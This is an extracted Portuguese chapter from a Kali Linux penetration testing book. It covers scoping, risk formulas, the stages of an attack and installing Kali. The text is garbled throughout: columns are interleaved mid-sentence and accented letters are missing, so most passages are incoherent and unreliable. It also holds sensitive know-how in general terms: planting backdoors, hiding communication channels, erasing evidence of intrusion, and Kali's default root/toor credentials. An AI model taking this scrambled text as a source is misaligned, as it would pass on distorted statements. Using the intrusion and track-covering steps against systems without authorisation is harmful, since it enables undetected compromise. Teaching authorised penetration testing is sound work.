avaliar crtica tipos de mtodos de teste, tais como servios, igualando menos custos profissionais que realizam testes de vulnerabilidades se um teste de digitalizao ou explorao no so para os servios de testes de penetrao porque imita abordagens penetrao concludo antes de permitidas e? Qual o risco associado penetrao. do mundo real atacar os sistemas desejados. com os mtodos de teste especficos Um grupo de segurana interna utilizado por atacantes e se concentra Por exemplo, um verificador da permitidos? Qual o impacto das geralmente executa teste de caixa em vulnerabilidades em vez de penetrao pode capturar as metas que branca. reconhecimento. credenciais do usurio para sistemas tornar-se inoperante devido a Teste de caixa cinza cai entre preto e O escopo do trabalho define a forma crticos tentativas de penetrao? Exemplos teste de caixa branca. quando a como os servios de penetrao ser e concluir com acesso a esses so; usando sociais cliente ou sistema proprietrio iniciado e executado. sistemas sem testar o quo vulnervel rede, fingindo ser um funcionrio, concorda que algumas informaes Ao inaugurar um compromisso de os ataque de negao de servio em desconhecido acabar servio Teste de Invaso deve incluir sistemas so a ataques baseados em chave ser descoberto durante uma fase de uma informao rede. Tambm importante incluir que sistemas, ou a execuo de scripts em reconhecimento, mas permite que o coleta de sesso usado para est ciente de servidores vulnerveis. Alguns verificador da penetrao documentar o ambiente de destino e o teste de penetrao como uma parte mtodos de ataque para pular esta parte. O verificador da definir os limites do escopo. Atacantes reais podem pode representar um risco maior de penetrao fornecido alguns da atribuio de evitar servios atacar a qualquer momento e sistemas prejudiciais do que outros. detalhes bsicos do alvo; desnecessrios ou sistemas de provavelmente quando as pessoas [11] no entanto, funcionamento interno e reconhecimento de ataque esto menos esperava. algumas outras informaes que esto fora do escopo. Um escopo Alguns fundamentos para o privilegiadas ainda mantido bem definido de trabalho vai desenvolvimento de um espao de do verificador da penetrao. economizar um prestador de servios trabalho para um teste de penetrao Teste de Invaso e Configurao [10] de so aumento do escopo (definido como como se segue: Ferramentas e software: Quais as Captulo 1 mudanas no controladas ou ferramentas e software so usados Atacantes reais tendem a ter algumas crescimento contnuo em um projeto Definio do sistema de destino (s): durante a penetrao informaes sobre um alvo antes de de Isto especifica quais sistemas devem Teste? Isto importante e um pouco se envolver escopo), operar dentro dos prazos ser testados. controverso. Muitos profissionais de o alvo. A maioria dos agressores (com previstos e ajudar a fornecer mais Isto inclui a localizao na rede, tipos segurana exceo de script kiddies ou precisa de sistemas e uso comercial indivduos a entregar ao encerrar servios. desses sistemas. Acredito que se eles divulgam suas nuvem provedor de servios que Teste deve comprometer um sistema com possveis itens de ao de ferramentas de que estar dando seu podem ser afetados a partir de seus ou um processo. Caso os dados remediao? Quem deve ser molho secreto. servios. sejam removidos notificado se um sistema Acreditamos que este apenas o Acesso Inicial Nvel: Que tipo de a partir da rede ou que o intruso inutilizada durante um exerccio de caso quando os profissionais de informao eo acesso fornecido apenas obter um determinado nvel de Teste de Invaso? O que acontece segurana amplamente utilizado antes de chutar fora o Teste de acesso no autorizado? se os dados confidenciais so produtos comerciais disponveis e so Invaso? O verificador da penetrao Produto final: Que tipo de relatrio detectados? A maioria dos servios de simplesmente rebranding relatrios tm final esperado? Que metas faz o testes de penetrao no enlatados de acesso ao servidor via Internet e / ou cliente especificar a ser realizado aps incluir remediao de problemas estes produtos. Profissionais de Intranet? Que tipo de conta inicial o fechamento de um servio Teste de encontrados. segurana experientes iro nvel de acesso concedido? este Invaso Algumas definies de servio que disponibilizar as ferramentas que so um preto, branco, cinza ou atribuio acordo? Certifique-se que as metas devem ser usados para definir o utilizado, e, em alguns casos, quando caixa para no so uma durao limitada para escopo de servios so: as vulnerabilidades so exploradas, cada alvo? evitar aumento do escopo documentao Definio de Espao Pblico-alvo: servio do esperado. qualquer um Auditoria de Segurana: Avaliando um os comandos usados dentro das Este define as funes especficas de dos dados classificados ou nvel de risco de uma aplicao do ferramentas para explorar uma negcios designados para um determinado sistema ou contra um vulnerabilidade. Isso faz com que o includo no teste de penetrao. Por grupo de pessoas? Como deve ser o conjunto de normas ou linhas de base. explorar recriados, e permite que o exemplo, a realizao de um teste de relatrio final ser entregue? As normas so regras obrigatrias, cliente realmente entender como o penetrao importante enquanto as linhas de base sistema em uma aplicao web especfico para entregar um relatrio de exemplo so o nvel mnimo aceitvel de foi comprometida ea dificuldade utilizado por vendas, enquanto no ou atualizaes peridicas para que segurana. Normas e linhas de base associada com a explorar. tocar em um diferente no haja surpresas atingir Partes notificadas: Quem est ciente aplicativo hospedado no mesmo no relatrio final. consistncia nas implementaes de do Teste de Invaso? Eles esto servidor. [12] segurana e pode ser especfico para informados Identificao de reas de operao as indstrias, antemo e capaz de preparar? crtica: Definir sistemas que no tecnologias e processos. reao aos esforos de penetrao deveria A maioria dos pedidos de segurana parte ser tocado para evitar um impacto serve para auditorias esto focados o mbito a ser testado? Se assim for, negativo nos servios de testes de em passar uma pode fazer sentido para no informar a penetrao. auditoria oficial (por exemplo, se segurana limites do servidor de autenticao preparando para uma empresa ou um equipe de operaes antes do teste ativo fora? importante fazer crtica Captulo 1 governo de penetrao. Isto muito importante ativos clara antes de contratar um auditoria), ou provar os requisitos quando alvo. Expectativas de remediao: Voc bsicos so atendidas por um olhando para aplicaes web que Definio da Bandeira: importante vulnerabilidades dever ser conjunto obrigatrio de podem ser hospedados por outra definir o quanto um Penetrao documentado regulamentaes (por exemplo a parte, como um seguir os mandatos HIPAA e HITECH para proteger registros de sade). ameaas. Servios devem incluir o entrega oferece risco potencial vulnerabilidades d uma verdadeira importante informar os potenciais acompanhamento com os clientes associado com todas as definio e senso de quo vulnervel clientes para ajudar com vulnerabilidades um sistema se os seus servios de auditoria remediao, juntamente com a elevar encontrado com possveis medidas de . Em muitos casos, isso significa que incluem qualquer nvel de seguro ou a fasquia para a segurana para alm remediao. Existem muitas solues, os relatrios de vulnerabilidade proteo se uma auditoria de qualquer indstria tais como atravs de ferramentas automticas no for bem sucedida depois de seus normas e linhas de base. Kali Linux que pode ser usado para ter de ser marcada. servios. Tambm fundamental para Avaliao de Vulnerabilidade: Este o fazer a varredura em busca de Os clientes vo querer saber o risco documentar o tipo processo em que os dispositivos de vulnerabilidades com base no sistema associado vulnerabilidade e de remediao includo com servios rede, / custo esperado para reduzir os riscos de auditoria (isto , se voc faria sistemas operacionais e software de tipo de servidor, sistema operacional, encontrados. Para fornecer o valor de identificar um problema, oferecer um aplicao so verificados, a fim de portas abertas para a comunicao e custo, plano de ao de remediao ou identificar outros importante entender como calcular o corrigir o problema). a presena de vulnerabilidades significa. Avaliaes de risco. Auditoria de conformidade muito conhecidas e desconhecidas. A Vulnerabilidade pode ser branco, Calculando risco mais do que correr uma ferramenta de vulnerabilidade uma lacuna, cinza, ou de caixa preta importante entender como calcular o segurana. Ele se baseia erro, ou fraqueza na forma como um dependendo da natureza da tarefa. risco associado com vulnerabilidades pesadamente sobre os tipos padro sistema projetado, usado e Scans de vulnerabilidade s so teis encontrado, de modo que uma de relatrios e seguindo uma protegido. Quando se calcular o risco. A desvantagem de deciso pode ser feito sobre a forma metodologia que uma vulnerabilidade explorada, pode muitas auditorias de segurana os de reagir. A maioria dos clientes olhar um padro aceito para a auditoria. resultar em dar acesso no resultados da verificao de ao tringulo CISSP da CIA ao Em muitos casos, as auditorias de autorizado, vulnerabilidade que fazem auditorias determinar o impacto do risco. CIA o segurana aos clientes uma falsa escalada de privilgios, ao ativo, ou de segurana confidencialidade, integridade e sensao de segurana outros resultados de negao de mais espessa, sem fornecer qualquer disponibilidade de um determinado dependendo do que normas ou linhas servio. valor real. Muitos scanners de sistema ou aplicativo. de base esto sendo auditados. A [13] vulnerabilidade Ao determinar o impacto do risco, os maioria das normas ter falsos positivos ou identificar clientes devem olhar para cada e linhas de base tm um processo de Teste de Invaso e Configurao vulnerabilidades que no esto componente atualizao muito tempo que no Avaliaes de Vulnerabilidade realmente l. Eles individualmente, bem como a capaz de manter-se com tipicamente parar uma vez que uma fazer isso porque eles incorretamente vulnerabilidade em sua totalidade para as rpidas mudanas nas ameaas vulnerabilidade encontrada, identificar o sistema operacional ou obter uma perspectiva verdadeira encontradas no mundo ciberntico de o que significa que o verificador da est procurando especfico do risco e determinar a probabilidade hoje. ALTAMENTE penetrao no executar um ataque patches para corrigir as de impacto. recomendado para oferecer servios contra vulnerabilidades, mas no olhando Cabe ao cliente decidir se o risco de segurana para alm das normas e a vulnerabilidade para verificar se ele para os patches cumulativos (patches associado vulnerabilidade linhas de base para genuno. A Avaliao de que encontrada justifica elevar o nvel de segurana para um Vulnerabilidade conter vrias manchas menores) ou ou supera o custo de controles nvel aceitvel de proteo para real revises de software. Atribuindo risco necessrios para reduzir o risco a um para nvel aceitvel. Um cliente pode no ser capaz de O prximo frmula importante para descobrir o investimento para os verificar se todas as vias de gastar um milho de dlares em identificar a freqncia com que o LES controles. Isto pode determinar se, e segurana foram cobertas. Teste de remediar uma ameaa que pode ocorrer. Se um quanto a Invaso pode ser preto, compromete impressoras de SLE vale um milho de dlares cliente deve investir em remediar a Branco ou caixa cinza, dependendo hspedes, no entanto, eles sero poderia acontecer uma vez em um vulnerabilidade encontrada em um do escopo de trabalho acordado. muito disposto a gastar duas vezes milho de anos, como um meteoro ativo. A principal diferena entre a Avaliao mais caindo do cu, pode no valer a pena Frmula de risco: de teste de penetrao e tanto em sistemas com dados investir milhes em uma redoma de Risco = Valor Patrimonial * Ameaa * vulnerabilidade confidenciais da empresa protegendo. proteo Vulnerabilidade * Impacto que um teste de penetrao vai agir [14] em torno de seu quartel-general. Em comum que os clientes no tm sobre vulnerabilidades encontradas e contrapartida, se um incndio pode valores para as variveis em Gesto verificar se eles esto Captulo 1 causar um milho de dlares de Riscos reduzindo reais da lista de risco O Certified Information Systems de dano e esperado a cada dois frmulas. Estas frmulas servem como associado confirmada com um alvo. A Security Professional (CISSP) Listas anos, seria aconselhvel investir em sistemas de orientao, para ajudar o Vulnerabilidade de currculo um incndio cliente a melhor Avaliao de um alvo pode mudar frmulas para calcular o risco da sistema de preveno. O nmero de entender como eles devem investir em para um teste de penetrao uma vez seguinte forma. vezes que um ativo perdido segurana. Nas minhas exemplos que o proprietrio do ativo AExpectativa de perda nica (LES) o chamado de Taxa Anual de anteriores, utilizando a autorizou o prestador de servios para custo de uma simples perda de um Ocorrncia (ARO). frmulas com valores estimados para executar ataques contra as Valor Patrimonial (AV). O Expectativa de perda anual (ALE) uma chuva de meteoros e fogo em um vulnerabilidades Fator de Exposio (EF) o impacto uma expresso da perda antecipada edifcio, deve identificado num alvo. Normalmente, da perda do activo vai ter a uma anual ajudar a explicar com valor em dlar os servios de testes de penetrao organizao devido ao risco. Por exemplo, uma estimada por um sistema de tm um custo mais elevado como a perda de receita devido a um queda de meteoros tem uma baixa preveno de incndios uma melhor associado desde os servios exigem servidor voltado para a Internet a ser expectativa de anualizada investimento de cpula de metal recursos mais caros, ferramentas e encerrado. Clientes (Uma vez em um milho de anos), protegendo a queda de objetos. tempo para deve calcular a SLE de um ativo ao enquanto que um incndio muito [15] completar tarefas com sucesso. Um avaliar os investimentos de segurana mais provvel e deve ser calculada equvoco popular que a penetrao para ajudar em Teste de Invaso e Configurao Servio de teste aumenta a segurana identificar o nvel de financiamento futuros investimentos para a proteo Teste de Invaso o mtodo de de TI pois os servios tm um custo que deve ser atribudo para controles. de um edifcio. atacar as vulnerabilidades do sistema mais elevado associado Se um SLE faria Anualizado frmula expectativa de de forma semelhante de outros servios de segurana: causar um milho de dlares em perda: para ataques maliciosos reais. danos para a empresa, no faria ALE = SLE * ARO Normalmente, os servios de testes O Teste de Invaso no tornar as sentido considerar A pergunta final e importante a ser de penetrao so solicitados quando redes de TI mais seguro, j que os que no oramento. respondida o risco associado a um um sistema ou rede esgotou os servios A nica frmula expectativa de perda: ativo usado investimentos em segurana e os avaliar a segurana existente! Um SLE = AV * EF clientes esto buscando cliente no deve considerar um Penetrao Testar se h uma crena a meta no sistema pode ser restaurado por um rentabilidade de tempo e servios Teste de caixa preta requer mais completamente seguro. cliente usando backups ou algum utilizados para entregar o reconhecimento do que o teste de Teste de Invaso pode causar um outro desastre engajamento Teste de Invaso. caixa branca, pois os dados so impacto negativo aos sistemas: mtodo de recuperao. Um processo mais eficiente e preciso no fornecidas sobre o alvo (s). fundamental para significa melhores resultados para Servios de reconhecimento pode ter autorizao por escrito das Teste de Penetrao expectativas menos servios utilizados. incluir pesquisa autoridades competentes, antes de entregveis devem ser bem definidos Quanto maior for a qualidade dos pegada de Internet de um alvo, os iniciar embora concordando resultados, quanto mais prximo o recursos de monitoramento, pessoas Um teste de penetrao de um ativo em um escopo de trabalho. Os servio pode atender ao cliente e processos, digitalizao pertence a outro partido. No ter mtodos mais comuns pelo qual expectativa, resultando em uma para obter informaes de rede, como adequado hackers obtm informaes melhor reputao e mais negcios no endereos IP e tipos de sistemas, autorizao pode ser visto como sobre as metas atravs de futuro. Para estes engenharia social pirataria ilegal pelas autoridades. engenharia social atravs de atacar as razes, importante desenvolver uma servios pblicos, como help desk e Autorizao pessoas, em vez de sistemas. metodologia para a execuo de outros meios. deve incluir quem responsvel por Exemplos est entrevistando para testes de penetrao Reconhecimento o primeiro passo quaisquer danos causados durante a uma posio dentro da organizao e servios, bem como sobre como de um compromisso de servio Teste penetrao saindo um denunciar o que for encontrado. de Invaso exerccio, bem como quem deve ser semana depois com dados sensveis Conceitos Kali Testes de Penetrao independentemente se voc est contactado a fim de evitar futuros oferecidos sem resistncia. Este tipo Kali Linux destina-se a seguir os verificando a informao conhecida ou impactos negativos de entrega maio fluxos de um servio de teste de buscando nova inteligncia uma vez que um sistema danificado. no ser aceitvel se um cliente est penetrao em um alvo. Reconnaissance comea A melhor prtica alertar os clientes interessado em saber o quo noivado. Independentemente se o por definir o ambiente de destino com de toda a vulnervel a web ponto de partida branco, preto, ou base em riscos potenciais associados com aplicaes so para o ataque remoto. teste de caixa cinza, o escopo do trabalho. Uma vez que o cada mtodo usado para comprometer tambm importante ter um objectivo h um conjunto de passos que devem alvo identificado, a pesquisa um alvo final definido assim ser seguidas ao Teste de Invaso um realizada para reunir antes de executar o ataque para que todas as partes compreendam alvo inteligncia no alvo, como o que definir as expectativas de nvel. Este quando os servios de penetrao so com Kali ou outras ferramentas. portas so usadas para a tambm um dos considerados concluiu. Passo 1 - Reconhecimento comunicao, onde razes que recomendamos Teste de Normalmente, uma entrega acordados Voc deve aprender o mximo ele est hospedado, o tipo de servios Invaso alvejado com um pequeno serve esse propsito. possvel sobre o ambiente de um alvo oferecidos aos clientes, e assim por alcance. [16] eo sistema diante. Esta vontade de dados mais fcil de ser muito mais traos antes de lanar um ataque. desenvolver um plano de ao em metdico na sua abordagem. Como Captulo 1 Quanto mais informaes voc pode relao aos mtodos mais fceis de comum O sucesso de um engajamento teste identificar cerca de obter os resultados desejados. melhores prticas, recebemos a de penetrao para um prestador de um alvo, a melhor chance que voc A entrega de um trabalho de confirmao, que um cenrio de pior servios baseado em tem que identificar o caminho mais reconhecimento deve incluir uma lista caso, que uma fcil e mais rpido para o sucesso. de todos os bens sendo alvo, quais aplicativos esto Tester deve saber o suficiente sobre Avaliando metas para vulnerabilidades dos proprietrios de ativos do alvo. associados com os ativos, servios um alvo para selecionar como analisar pode ser manual ou automtico O sucesso desta etapa fortemente utilizados, e a possvel atravs de dependente de esforos anteriores. A possveis proprietrios de ativos. vulnerabilidades ou fraqueza. ferramentas. H uma srie de maioria dos exploits Kali Linux oferece uma categoria Exemplos para testes para a fraqueza ferramentas oferecidas em Kali Linux so desenvolvidos para denominada Coleta de Informaes na forma como a web agrupados como uma categoria vulnerabilidades especficas e pode que serve como aplicao opera, os servios rotulada causar consequncias indesejveis um recurso de reconhecimento. As identificados, portas de comunicao, Anlise de Vulnerabilidade. se executado de forma incorreta. A ferramentas incluem mtodos para a ou outros meios. Ferramentas variam de avaliar os melhor prtica identificar um pesquisa de rede, dados Avaliaes de vulnerabilidade e dispositivos de rede de bancos de punhado de vulnerabilidades e sistemas de centro, sem fio e de auditorias de segurana tipicamente dados. desenvolvimento de uma estratgia de acolhimento. concluir aps este O seguinte a lista de objetivos de ataque baseado na liderana com o [17] fase do processo de avaliao alvo. avaliao Alvo: primeiro mais vulnerveis. Capturando informaes detalhadas Explorando alvos pode ser manual ou Teste de Invaso e Configurao atravs Reconnaissance melhora a automatizado de acordo com o O seguinte a lista de objetivos de preciso objectivo final. reconhecimento: de direcionamento de possveis Alguns exemplos esto executando o vulnerabilidades, reduz o tempo de Alvos de avaliao para fraqueza SQL Injees para ganhar acesso de execuo para executar alvo Identificar e priorizar os sistemas administrador para uma aplicao web servios de avaliao, e ajuda a evitar vulnerveis ou engenharia social uma pessoa de segurana existente. Por exemplo, Mapa sistemas vulnerveis aos Helpdesk em fornecer credenciais de executando proprietrios de ativos login de administrador. um scanner de vulnerabilidade Descobertas de documentos Kali Linux oferece um catlogo genrico contra um servidor de [18] dedicado de ferramentas intitulado Identificar alvo (s) aplicativos web seria provavelmente Ferramentas de Explorao para a Definir aplicativos e uso comercial alertar o proprietrio do ativo, tome um Captulo 1 explorao de Identificar tipos de sistemas tempo para executar e gerar apenas Passo 3 - Explorao metas que vo desde a explorao de Identificar portas disponveis detalhes genricos Esta etapa explora vulnerabilidades servios especficos para pacotes de Identificar servios em execuo sobre o sistema e aplicaes. encontradas para verificar se as engenharia social. Informaes engenheiro passivamente Digitalizar um servidor para uma vulnerabilidades so reais e que O seguinte a lista de objetivos de sociais vulnerabilidade especfica possvel de informaes ou acesso explorao: Descobertas de documentos com base em dados obtidos a partir pode ser obtido. Explorao separa Etapa 2 - Avaliao Alvo Reconnaissance seria mais difcil para Penetrao Uma vez que um alvo identificado e o proprietrio do ativo Testando servios de servios pesquisado a partir de esforos de de detectar, proporcionar uma boa passivos tais como avaliaes de reconhecimento, a prxima vulnerabilidade possvel explorar e vulnerabilidade e auditorias. passo avaliar o alvo para tomar segundos A explorao e todas as etapas a vulnerabilidades. Neste ponto, a para executar. seguir tm ramificaes legais sem Explorar vulnerabilidades penetrao autorizao Obter apoio para o p Captura de dados no autorizada o Ataques senha e Ferramentas de mtodos poderiam ser backdoors, Injetar dados falsos, se necessrio Engenheiro agressivamente sociais Explorao catlogo. Como a maioria novas contas de administrao, tneis Esconder mtodos de comunicao Atacar outros sistemas ou aplicaes dessas ferramentas criptografados, por meio de criptografia e outros Descobertas de documentos incluem mtodos para obter acesso e novos canais de acesso rede. meios Passo 4 - Privilege Escalation inicial e Privilege Escalation, eles O outro aspecto importante da Descobertas de documentos Ter acesso a um alvo no garante a esto reunidos manuteno de uma posio em um [20] realizao do objetivo de uma e agrupados de acordo com os seus alvo est removendo penetrao conjuntos de ferramentas. evidncia da penetrao. Isso far Captulo 1 atribuio. Em muitos casos, um A seguir est uma lista de objetivos com que seja mais difcil de detectar o Apresentando Kali Linux sistema de explorao de vulnervel escalonamento de privilgios: ataque, assim, Os criadores do BackTrack lanaram s pode dar limitado reduzindo a reaco por barreiras de um novo Teste de Invaso, avanado acesso aos dados e recursos de um segurana. Removendo evidncia Distribuio Linux chamada Kali Linux. alvo. O atacante deve escalar inclui apagamento BackTrack 5 foi a ltima verso privilgios concedidos usurio fizer, mascarando os canais principal do para obter o acesso necessrio para Obter acesso Escalado nvel de de acesso existentes e remover os a distribuio BackTrack. Os criadores capturar a bandeira, o que poderia ser sistema (s) e rede (s) vestgios de adulterao do BackTrack decidiu que para dados sensveis, crticos Descubra outras informaes de conta como mensagens de erro causadas avanar infra-estrutura, e assim por diante. de usurio por esforos de penetrao. com os desafios da segurana Privilege Escalation pode incluir a Acessar outros sistemas com Kali Linux inclui um catlogo intitulado ciberntica e testes moderno uma identificao e rachaduras senhas, privilgios escalados Mantendo o acesso focado em manter nova fundao foi contas de usurio, Descobertas de documentos uma necessrio. Kali Linux nasceu e foi e espao de TI no autorizado. Um Passo 5 - a manuteno de um ponto ponto de apoio dentro de um alvo. As lanado em 13 de maro de 2013. Kali exemplo alcanar o acesso de de apoio ferramentas so usadas para Linux baseado usurio limitado, identificando O passo final manter o acesso ao estabelecer diversas formas de em Debian e um sistema de arquivos um arquivo shadow contendo as estabelecer outros pontos de entrada backdoors FHS-compliant. credenciais de login de administrao, para o destino em um alvo. Kali tem muitas vantagens sobre a obteno de um administrador e, se possvel, cobrindo evidncia da A seguir est uma lista de metas para BackTrack. Ele vem com muitas senha atravs de quebra de senha e penetrao. possvel que a a manuteno de um ponto de apoio: ferramentas mais atualizadas. acessar sistemas aplicativos internos penetrao As ferramentas so simplificados com com direitos de acesso de esforos ir acionar as defesas que os repositrios do Debian e administrador. acabar por garantir como o sincronizados quatro vezes [19] verificador da penetrao um dia. Isso significa que os usurios obtido o acesso rede. A melhor tenham as ltimas atualizaes de Teste de Invaso e Configurao prtica estabelecer outros meios de pacotes e correes de segurana. O Kali Linux inclui uma srie de acesso Estabelecer vrios mtodos de acesso novo ferramentas que podem ajudar a o alvo como um seguro contra o rede alvo sistemas de arquivos compatveis ganhar Privilege Escalation atravs principal caminho a ser fechado. Remover prova de acesso autorizado traduzir-se em execuo a maioria das Acesso alternativo Sistemas de reparo que impactam ferramentas de qualquer lugar no pela explorao sistema. Kali tambm fez personalizao, planeja us-lo em um ambiente virtual. requisitos de hardware so mostrados Voc pode escolher o tipo de instalao automtica, e rea de Correndo Kali Linux a partir de uma na lista a seguir, embora sugerimos instalao (baseado em GUI ou trabalho flexvel mdia externa excedendo o valor mnimo por pelo baseado em texto) ambientes caractersticas fortes em Kali Linux pode ser executado sem menos trs vezes. Kali Linux, em voc gostaria de realizar. Kali Linux. instalao de software em um disco geral, [22] Kali Linux est disponvel para rgido de acolhimento, acessando ter um desempenho melhor se ele download em http://www.kali.org/. lo de uma fonte de mdia externa, tem acesso a mais memria RAM e Captulo 1 Configurao do sistema Kali como uma unidade de DVD ou USB. instalado em mquinas mais novas. 2. Selecione o idioma de preferncia Kali Linux pode ser baixado em Este mtodo simples Baixe Kali Linux e quer queimar o ISO local, pas e algumas maneiras diferentes. Um dos para permitir, no entanto, tem o para DVD, ou preparar um pendrive preferncias do teclado. mais populares desempenho e implementaes com 3. Escolha um nome de host para o maneiras de obter Kali Linux baixar operacionais. Kali Linux Kali Linux Viva como o meio de host Kali Linux. O padro a imagem ISO. A imagem ISO est ter que carregar programas a partir de instalao. Se voc no tiver uma hostname Kali. disponvel uma fonte remota iria afetar o unidade de DVD ou um [23] em imagens de 32 bits e de 64 bits. desempenho e alguns Porta USB do seu computador, confira Se voc planeja usar o Kali Linux em aplicativos ou configuraes de o Linux Network Kali Instalar. Teste de Invaso e Configurao uma mquina virtual como o VMware, hardware podem no funcionar A seguir est uma lista de requisitos 4. Escolha uma senha. Senhas no corretamente. Usando somente leitura mnimos de instalao: simples pode no funcionar to uma imagem pr-construdos VM. A de armazenamento Escolheu algo que tem um certo grau vantagem de baixar a imagem da VM mdia no permite salvar as de complexidade. que configuraes personalizadas que 5. O prximo prompt pede para o seu ele vem pr-carregado com podem ser necessrios para fazer Kali fuso horrio. Modificar de acordo ferramentas VMware. A imagem de Linux Um mnimo de 8 GB de espao em e selecione Continuar. A prxima VM uma imagem de 32 bits com operar corretamente. altamente disco para a instalao de Kali Linux. imagem mostra a seleo Physical Address Extension apoio, ou recomendado para instalar Kali Linux Para arquiteturas i386 e amd64, um Oriental tempo padro. mais conhecido como PAE. Em teoria, em um disco rgido host. mnimo de 512MB de RAM. [24] um PAE [21] Suporte de inicializao de CD-DVD do kernel permite que o sistema para Drive / USB. Captulo 1 acessar mais memria do que um Teste de Invaso e Configurao Voc tambm vai precisar de uma O instalador ir pedir para configurar sistema tradicional de 32 bits Instalando Kali Linux conexo ativa com a Internet antes da suas parties. Se voc estiver sistema operativo. Houve algumas Instalando Kali Linux em seu instalao. Este instalando em uma Kali virtuais personalidades bem conhecidas no computador simples e semelhante muito importante ou voc no ser imagem, selecione Guiado Instale - mundo da instalao capaz de configurar e acessar disco inteiro. Isto ir destruir todos os sistemas operacionais que tm outros sistemas operacionais. Em repositrios dados do disco argumentado a favor e contra a primeiro lugar, voc vai precisar de durante a instalao. Kali e instalar Linux. Tenha em mente utilidade de um kernel PAE. hardware compatvel. Barrilha 1. Quando voc comear a Kali, voc que em uma mquina virtual, s o No entanto, os autores deste livro compatvel com i386, amd64 e ser presenteado com uma tela de disco virtual sugiro usar a imagem da VM de Kali plataformas ARM (ambos Armel e inicializao de instalao. est sendo destrudo. Os usurios Linux se armhf). O avanados podem selecionar configuraes manuais para Captulo 1 Se voc baixou uma imagem de VM directamente a partir desta categoria. personalizar 8. Kali ir pedir para instalar o GRUB. de Kali, voc vai precisar da senha de No entanto aplicaes web nem parties. Kali tambm oferece a GRUB um multi-bootloader que root. O padro sempre se referem opo de utilizar LVM, gerente de d ao usurio a capacidade de nome de usurio raiz e senha toor. de ataques contra servidores web, volume lgico. LVM escolher e arrancar a operao Viso geral ferramentas Kali eles podem simplesmente ser permite-lhe gerir e redimensionar mltipla Kali Linux oferece uma srie de ferramentas baseadas na Web para parties aps a instalao. Em teoria, sistemas. Em quase todos os casos, ferramentas personalizadas servios de rede. Por exemplo, a web supe-se voc deve selecionar para instalar o concebidas para testes de penetrao. proxies ser encontrado em para permitir a flexibilidade, quando as GRUB. Se voc Ferramentas so classificadas nos nesta seo. necessidades de armazenamento de est configurando o seu sistema de seguintes grupos como visto no menu Senha Ataques: Esta seo de mudar de instalao inicial. No dual boot, voc vai querer ter drop-down ferramentas lida principalmente com a entanto, certeza GRUB reconhece os outros mostrado na tela a seguir: fora bruta ou a menos que as suas necessidades sistemas operacionais a fim de que a [29] a computao desligada de senhas ou de Kali Linux so extremamente dar aos usurios as opes para cdigos compartilhados usados para complexas, muito provavelmente voc inicializar em um sistema operacional Teste de Invaso e Configurao autenticao. no vai precisar alternativo. Ataques sem fio: Estas so us-lo. Se ele no detectar quaisquer outros Coleta de Informaes: Estas so ferramentas utilizadas para explorar [25] sistemas operacionais, a mquina ferramentas de reconhecimento as vulnerabilidades encontradas em iniciar automaticamente em Kali Linux. utilizados para coletar dados protocolos sem fio. 802.11 Teste de Invaso e Configurao [27] em sua rede alvo e dispositivos. ferramentas sero encontrados aqui, 6. A ltima janela apresenta uma Ferramentas variam de identificar os incluindo ferramentas como reviso das definies de instalao. Teste de Invaso e Configurao dispositivos a aircrack, airmon e ferramentas de Se 9. Parabns! Voc terminou de protocolos utilizados. quebra de senhas wireless. Alm tudo parece correto, selecione Sim instalar Kali Linux. Voc ir Anlise de Vulnerabilidade: disso, esta para continuar o processo, como deseja remover todos os meios Ferramentas deste seco concentrar seo tem ferramentas relacionadas a mostrado (fsicos ou virtuais) e selecione em sistemas de avaliao vulnerabilidades de RFID e Bluetooth na imagem seguinte: Continuar de vulnerabilidades. Normalmente, tambm. Em 7. Kali Linux usa repositrios centrais para reiniciar o sistema. estes so executados em sistemas muitos casos, as ferramentas desta de distribuio de aplicativos [28] encontrados usando o seo ter de ser usado com uma pacotes. Se voc gostaria de instalar Coleta de informaes ferramentas de rede sem fio esses pacotes, voc precisa usar Captulo 1 reconhecimento. adaptador que pode ser configurado um espelho de rede. Os pacotes so Kali Linux e VM imagem primeira Aplicaes Web: Estas so pelo Kali para ser colocado em modo baixados atravs do protocolo HTTP. corrida ferramentas utilizadas para auditar e promscuo. Se sua rede usa um servidor proxy, Em alguns mtodos de instalao Kali, explorar vulnerabilidades Ferramentas de Explorao: Estas voc tambm vai precisar configurar voc ser solicitado a definir a senha em servidores web. Muitas das so ferramentas utilizadas para as configuraes de proxy para voc do root. ferramentas de auditoria, vamos explorar vulnerabilidades encontradas rede. Quando Kali Linux inicializa, digite o referimos neste livro vm em sistemas. Normalmente, a [26] nome de usurio do root ea senha que vulnerabilidade identificada durante voc selecionou. uma vulnerabilidade Avaliao de um alvo. Servios do Sistema: Isto onde voc e simplificar o desenvolvimento de um Cheirando e falsificao: Estas so as pode ativar e desativar servios de mbito aceitvel de trabalho. ferramentas utilizadas para a captura Kali. Este captulo continuou com o de pacotes de rede, Os servios so agrupados em carne fornecimento de uma viso geral de manipuladores de pacotes de rede, bovina, Dradis, HTTP, Metasploit, Kali Linux. Os tpicos includos aplicaes de artesanato pacotes e [30] MySQL, e SSH. como baixar a verso desejada de Kali web Existem outras ferramentas includas Linux, maneiras de executar a spoofing. H tambm algumas Captulo 1 no Kali Linux construir tais como web instalao, aplicaes de reconstruo VoIP. navegadores, links rpidos para e uma breve viso geral de conjuntos Mantendo o acesso: Manter Teste de Stress: Ferramentas de ajustar a forma como a construo de ferramentas disponveis. O prximo ferramentas de acesso so usados testes de estresse so utilizados para Kali Linux visto em captulo ir cobrir como executar uma vez um ponto de apoio avaliar a quantidade de dados a da rede, ferramentas de busca e Reconhecimento em um alvo. Este o estabelecida em uma rede ou sistema pode manipular. Resultados outras aplicaes teis. primeiro e mais importante passo na sistema alvo. comum encontrar indesejados podem ser obtidos a partir concretizao sistemas comprometidos com vrios de sobrecarga Servios de testes de penetrao. ganchos de volta para o atacante sistemas como causando um [31] fornecer rotas alternativas em caso de dispositivo de controle de uma vulnerabilidade que usado por comunicao de rede para Resumo Reconhecimento o atacante encontrado e corrigido. abrir todos os canais de comunicao Este captulo serve como uma O termo Reconhecimento por Engenharia reversa: Estas ou de um sistema de desligar introduo para Aplicaes Web Teste definio vem da estratgia de guerra ferramentas so usadas para (tambm conhecido como de Invaso militar de desativar um executvel um ataque de negao de servio). e uma viso geral sobre a criao de explorar alm da rea ocupada por e programas de depurao. O objetivo Hardware Hacking: Esta seo Kali Linux. Ns comeamos definindo foras amigas para obter informaes da engenharia reversa est contm ferramentas de Android, que as melhores prticas sobre o analisando poderiam ser para a realizao de servios de Teste inimigo para anlise ou ataque futuro. como foi desenvolvido um programa classificada como ferramentas mveis, de Penetrao incluindo risco de Reconhecimento de sistemas de para que possa ser copiado, e Ardunio que so utilizados para a definio e diferenas computador semelhante 